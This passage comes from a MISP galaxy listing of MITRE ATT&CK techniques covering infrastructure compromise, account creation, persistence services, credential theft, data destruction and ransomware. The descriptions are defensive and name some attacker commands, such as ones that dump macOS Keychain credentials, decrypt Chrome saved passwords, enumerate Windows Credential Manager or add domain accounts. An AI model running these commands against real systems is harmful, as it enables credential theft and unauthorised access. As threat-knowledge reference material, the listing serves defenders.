Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.[Microsoft Sub Takeover 2020]

Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.[Palo Alto Unit 42 Domain Shadowing 2022]

Internal MISP references

UUID 581722ea-81a5-4c73-a703-2c994f1cf814 which can be used as unique global reference for Domains in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1584.001
Related clusters

To see the related clusters, click here.

Server

Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a Server or Virtual Private Server, adversaries may compromise third-party servers in support of operations.

Adversaries may also compromise web servers to support watering hole operations, as in Drive-by Compromise, or email servers to support Phishing operations.

Internal MISP references

UUID ce71e252-3403-4287-a0b5-9328fa88af96 which can be used as unique global reference for Server in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1584.004
Related clusters

To see the related clusters, click here.

Serverless

Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.

Once compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to Proxy traffic to an adversary-owned command and control server.[BlackWater Malware Cloudflare Workers][AWS Lambda Redirector] As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.[Detecting Command & Control in the Cloud][BlackWater Malware Cloudflare Workers]

Internal MISP references

UUID f2b5a3e4-8a59-41f5-88c4-142f2da251c8 which can be used as unique global reference for Serverless in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1584.007
Related clusters

To see the related clusters, click here.

Virtual Private Server

Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.[NSA NCSC Turla OilRig]

Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.

Internal MISP references

UUID 3bd8c928-a7c8-4376-8f2f-2e0fcb449b37 which can be used as unique global reference for Virtual Private Server in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1584.003
Related clusters

To see the related clusters, click here.

Web Services

Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control (Web Service), Exfiltration Over Web Service, or Phishing.[Recorded Future Turla Infra 2020] Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.

Internal MISP references

UUID ef312a77-6b1a-4be6-a220-3c689e7fcd9d which can be used as unique global reference for Web Services in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1584.006
Related clusters

To see the related clusters, click here.

Compromise Infrastructure

Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.[Mandiant APT1][ICANNDomainNameHijacking][Talos DNSpionage Nov 2018][FireEye EPS Awakens Part 2] Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.

Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with Digital Certificates) to further blend in and support staged information gathering and/or Phishing campaigns.[FireEye DNS Hijack 2019] Additionally, adversaries may also compromise infrastructure to support Proxy and/or proxyware services.[amnesty_nso_pegasus][Sysdig Proxyjacking]

By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.[NSA NCSC Turla OilRig]

Internal MISP references

UUID c12d81d3-abe4-43d7-8a65-f4b3150e722d which can be used as unique global reference for Compromise Infrastructure in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Container Administration Command

Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.[Docker Daemon CLI][Kubernetes API][Kubernetes Kubelet]

In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.[Docker Entrypoint][Docker Exec] In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.[Kubectl Exec Get Shell]

Internal MISP references

UUID 0b9609dd-9f19-4747-ba6e-421b6b7ff03f which can be used as unique global reference for Container Administration Command in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers']
source MITRE
Related clusters

To see the related clusters, click here.

Container and Resource Discovery

Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.

These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.[Docker API][Kubernetes API] In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.

Internal MISP references

UUID 41c4b4cc-99da-4323-b0f4-229906578501 which can be used as unique global reference for Container and Resource Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers']
source MITRE
Related clusters

To see the related clusters, click here.

Content Injection

Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., Drive-by Target followed by Drive-by Compromise), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., Ingress Tool Transfer) and other data to already compromised systems.[ESET MoustachedBouncer]

Adversaries may inject content to victim systems in various ways, including:

  • From the middle, where the adversary is in-between legitimate online client-server communications (Note: this is similar but distinct from Adversary-in-the-Middle, which describes AiTM activity solely within an enterprise environment) [Kaspersky Encyclopedia MiTM]
  • From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server [Kaspersky ManOnTheSide]

Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."[Kaspersky ManOnTheSide][ESET MoustachedBouncer][EFF China GitHub Attack]

Internal MISP references

UUID 3f95e4f2-cd4a-502c-a12a-becb8d28440c which can be used as unique global reference for Content Injection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Account

Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.[Microsoft O365 Admin Roles][Microsoft Support O365 Add Another Admin, October 2019][AWS Create IAM User][GCP Create Cloud Identity Users][Microsoft Azure AD Users]

Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.

Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding Additional Cloud Credentials or assigning Additional Cloud Roles.

Internal MISP references

UUID d6504a4d-f6d7-4517-b0fd-ec7128d4dec9 which can be used as unique global reference for Cloud Account in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1136.003
Related clusters

To see the related clusters, click here.

Domain Account

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Internal MISP references

UUID 7a7e10ce-f033-460c-9183-5e29a9feb927 which can be used as unique global reference for Domain Account in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1136.002
Related clusters

To see the related clusters, click here.

Local Account

Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

For example, with a sufficient level of access, the Windows net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Local accounts may also be added to network devices, often via common Network Device CLI commands such as username, or to Kubernetes clusters using the kubectl utility.[cisco_username_cmd][Kubernetes Service Accounts Security]

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Internal MISP references

UUID 287201c6-56c8-458d-a6b3-5d84ad1099d7 which can be used as unique global reference for Local Account in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1136.001
Related clusters

To see the related clusters, click here.

Create Account

Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.

Internal MISP references

UUID 55bcf759-a0bf-47e9-99f8-4e8ca997e6ce which can be used as unique global reference for Create Account in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Launch Agent

Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.[AppleDocs Launch Agent Daemons][OSX Keydnap malware] [Antiquated Mac Malware] Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.[OSX.Dok Malware] Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.

Launch Agents can also be executed using the Launchctl command.

Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.[Sofacy Komplex Trojan][Methods of Mac Malware Persistence] The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.[OSX Malware Detection][OceanLotus for OS X]

Internal MISP references

UUID 6dbe030c-5f87-4b45-9b6b-5bba2c0fad00 which can be used as unique global reference for Launch Agent in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1543.001
Related clusters

To see the related clusters, click here.

Launch Daemon

Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.[AppleDocs Launch Agent Daemons][Methods of Mac Malware Persistence][launchd Keywords for plists]

Adversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. Masquerading). When the Launch Daemon is executed, the program inherits administrative permissions.[WireLurker][OSX Malware Detection]

Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.[LaunchDaemon Hijacking][sentinelone macos persist Jun 2019]

Internal MISP references

UUID eff618a9-6498-4b01-bca1-cd5f3784fc27 which can be used as unique global reference for Launch Daemon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1543.004
Related clusters

To see the related clusters, click here.

Systemd Service

Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.[Linux man-pages: systemd January 2014] Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.

Systemd utilizes unit configuration files with the .service file extension to encode information about a service's process. By default, system level unit files are stored in the /systemd/system directory of the root owned directories (/). User level unit files are stored in the /systemd/user directories of the user owned directories ($HOME).[lambert systemd 2022]

Inside the .service unit files, the following directives are used to execute commands:[freedesktop systemd.service]

  • ExecStart, ExecStartPre, and ExecStartPost directives execute when a service is started manually by systemctl or on system start if the service is set to automatically start.
  • ExecReload directive executes when a service restarts.
  • ExecStop, ExecStopPre, and ExecStopPost directives execute when a service is stopped.

Adversaries have created new service files, altered the commands a .service file’s directive executes, and modified the user directive a .service file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.[Anomali Rocke March 2019][airwalk backdoor unix systems][Rapid7 Service Persistence 22JUNE2016]

Internal MISP references

UUID 7aae1ad0-fb1f-484a-a176-c94e4c7ada77 which can be used as unique global reference for Systemd Service in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1543.002
Related clusters

To see the related clusters, click here.

Windows Service

Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.[TechNet Services] Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API.

Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: .sys) to disk, the payload can be loaded and registered via Native API functions such as CreateServiceW() (or manually via functions such as ZwLoadDriver() and ZwSetValueKey()), by creating the required service Registry values (i.e. Modify Registry), or by using command-line utilities such as PnPUtil.exe.[Symantec W.32 Stuxnet Dossier][Crowdstrike DriveSlayer February 2022][Unit42 AcidBox June 2020] Adversaries may leverage these drivers as Rootkits to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of Exploitation for Privilege Escalation.[ESET InvisiMole June 2020][Unit42 AcidBox June 2020]

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through Service Execution. To make detection analysis more challenging, malicious services may also incorporate Masquerade Task or Service (ex: using a service and/or payload name related to a legitimate OS or benign software component).

Internal MISP references

UUID 31c6dd3c-3eb2-46a9-ab85-9e8e145810a1 which can be used as unique global reference for Windows Service in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1543.003
Related clusters

To see the related clusters, click here.

Create or Modify System Process

Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.[TechNet Services] On macOS, launchd processes known as Launch Daemon and Launch Agent are run to finish system initialization and load user specific parameters.[AppleDocs Launch Agent Daemons]

Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.

Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.[OSX Malware Detection]

Internal MISP references

UUID f8aa018b-5134-4201-87f2-e55d20f40b17 which can be used as unique global reference for Create or Modify System Process in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Secrets Management Stores

Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.

Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.

If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged Cloud Accounts or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as get-secret-value in AWS, gcloud secrets describe in GCP, and az key vault secret show in Azure.[Permiso Scattered Spider 2023][Sysdig ScarletEel 2.0 2023][AWS Secrets Manager][Google Cloud Secrets][Microsoft Azure Key Vault]

Note: this technique is distinct from Cloud Instance Metadata API in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.

Internal MISP references

UUID 260571a6-3c08-5419-98c5-3fa1aa8e675d which can be used as unique global reference for Cloud Secrets Management Stores in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1555.006
Related clusters

To see the related clusters, click here.

Credentials from Web Browsers

Adversaries may acquire credentials from web browsers by reading files specific to the target browser.[Talos Olympic Destroyer 2018] Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.

For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key.[Microsoft CryptUnprotectData April 2018]

Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.[Proofpoint Vega Credential Stealer May 2018][FireEye HawkEye Malware July 2017] Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the Windows Credential Manager.

Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.[GitHub Mimikittenz July 2016]

After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).

Internal MISP references

UUID b4a1cbaa-85d1-4a65-977f-494f66a141e3 which can be used as unique global reference for Credentials from Web Browsers in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1555.003
Related clusters

To see the related clusters, click here.

Keychain

Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service.

Keychains can be viewed and edited through the Keychain Access application or using the command-line utility security. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/.[Keychain Services Apple][Keychain Decryption Passware][OSX Keychain Schaumann]

Adversaries may gather user credentials from Keychain storage/memory. For example, the command security dump-keychain –d will dump all Login Keychain credentials from ~/Library/Keychains/login.keychain-db. Adversaries may also directly read Login Keychain credentials from the ~/Library/Keychains/login.keychain file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.[External to DA, the OS X Way][Empire Keychain Decrypt]

Internal MISP references

UUID 1ef8a053-ff13-4a10-b9d9-0a017880e4a5 which can be used as unique global reference for Keychain in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1555.001
Related clusters

To see the related clusters, click here.

Password Managers

Adversaries may acquire user credentials from third-party password managers.[ise Password Manager February 2019] Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.[ise Password Manager February 2019]

Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.[FoxIT Wocao December 2019][Github KeeThief] Adversaries may extract credentials from memory via Exploitation for Credential Access.[NVD CVE-2019-3610] Adversaries may also try brute forcing via Password Guessing to obtain the master password of a password manager.[Cyberreason Anchor December 2019]

Internal MISP references

UUID 9448cf6f-7ba3-41d1-8710-8e6f9b0572ee which can be used as unique global reference for Password Managers in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1555.005
Related clusters

To see the related clusters, click here.

Securityd Memory

An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.[OS X Keychain][OSX Keydnap malware]

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.[OS X Keychain][External to DA, the OS X Way] Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.[OS X Keychain]

Internal MISP references

UUID fd75ec36-fc88-4bee-9fd9-480df6d1e765 which can be used as unique global reference for Securityd Memory in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1555.002
Related clusters

To see the related clusters, click here.

Windows Credential Manager

Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).[Microsoft Credential Manager store][Microsoft Credential Locker]

The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of Credentials from Web Browsers, Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.

Credential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.[passcape Windows Vault][Malwarebytes The Windows Vault]

Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as CredEnumerateA, may also be absued to list credentials managed by the Credential Manager.[Microsoft CredEnumerate][Delpy Mimikatz Crendential Manager]

Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running rundll32.exe keymgr.dll KRShowKeyMgr then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.

Password recovery tools may also obtain plain text passwords from the Credential Manager.[Malwarebytes The Windows Vault]

Internal MISP references

UUID 9503955c-fa53-452a-b717-7e23bfb4df83 which can be used as unique global reference for Windows Credential Manager in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1555.004
Related clusters

To see the related clusters, click here.

Credentials from Password Stores

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

Internal MISP references

UUID a0bb264e-8617-4ae6-bafd-f52b36c63d12 which can be used as unique global reference for Credentials from Password Stores in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data Destruction

Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.[Symantec Shamoon 2012][FireEye Shamoon Nov 2016][Palo Alto Shamoon Nov 2016][Kaspersky StoneDrill 2017][Unit 42 Shamoon3 2018][Talos Olympic Destroyer 2018] Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from Disk Content Wipe and Disk Structure Wipe because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.

Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.[Kaspersky StoneDrill 2017][Unit 42 Shamoon3 2018] In some cases politically oriented image files have been used to overwrite data.[FireEye Shamoon Nov 2016][Palo Alto Shamoon Nov 2016][Kaspersky StoneDrill 2017]

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[Symantec Shamoon 2012][FireEye Shamoon Nov 2016][Palo Alto Shamoon Nov 2016][Kaspersky StoneDrill 2017][Talos Olympic Destroyer 2018].

In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.[Data Destruction - Threat Post][DOJ - Cisco Insider]

Internal MISP references

UUID e5016c2b-85fe-4e6b-917d-0dd5b441cc34 which can be used as unique global reference for Data Destruction in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Non-Standard Encoding

Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.[Wikipedia Binary-to-text Encoding] [Wikipedia Character Encoding]

Internal MISP references

UUID 0848222e-ddc2-489e-8ea4-e19634f6af34 which can be used as unique global reference for Non-Standard Encoding in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1132.002
Related clusters

To see the related clusters, click here.

Standard Encoding

Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.[Wikipedia Binary-to-text Encoding][Wikipedia Character Encoding] Some data encoding systems may also result in data compression, such as gzip.

Internal MISP references

UUID 972f0311-aec5-4fb5-bc5b-504c3f0cc95c which can be used as unique global reference for Standard Encoding in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1132.001
Related clusters

To see the related clusters, click here.

Data Encoding

Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.[Wikipedia Binary-to-text Encoding] [Wikipedia Character Encoding] Some data encoding systems may also result in data compression, such as gzip.

Internal MISP references

UUID 7d8af4f3-7d8e-4ef2-b828-40a910fc6188 which can be used as unique global reference for Data Encoding in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data Encrypted for Impact

Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.[US-CERT Ransomware 2016][FireEye WannaCry 2017][US-CERT NotPetya 2017][US-CERT SamSam 2018]

In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as File and Directory Permissions Modification or System Shutdown/Reboot, in order to unlock and/or gain access to manipulate these files.[CarbonBlack Conti July 2020] In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.[US-CERT NotPetya 2017]

To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[FireEye WannaCry 2017][US-CERT NotPetya 2017] Encryption malware may also leverage Internal Defacement, such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").[NHS Digital Egregor Nov 2020]

In cloud environments, storage objects within compromised accounts may also be encrypted.[Rhino S3 Ransomware Part 1]

Internal MISP references

UUID f0c36d24-263c-4811-8784-f716c77ec6b3 which can be used as unique global reference for Data Encrypted for Impact in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data from Cloud Storage

Adversaries may access data from cloud storage.

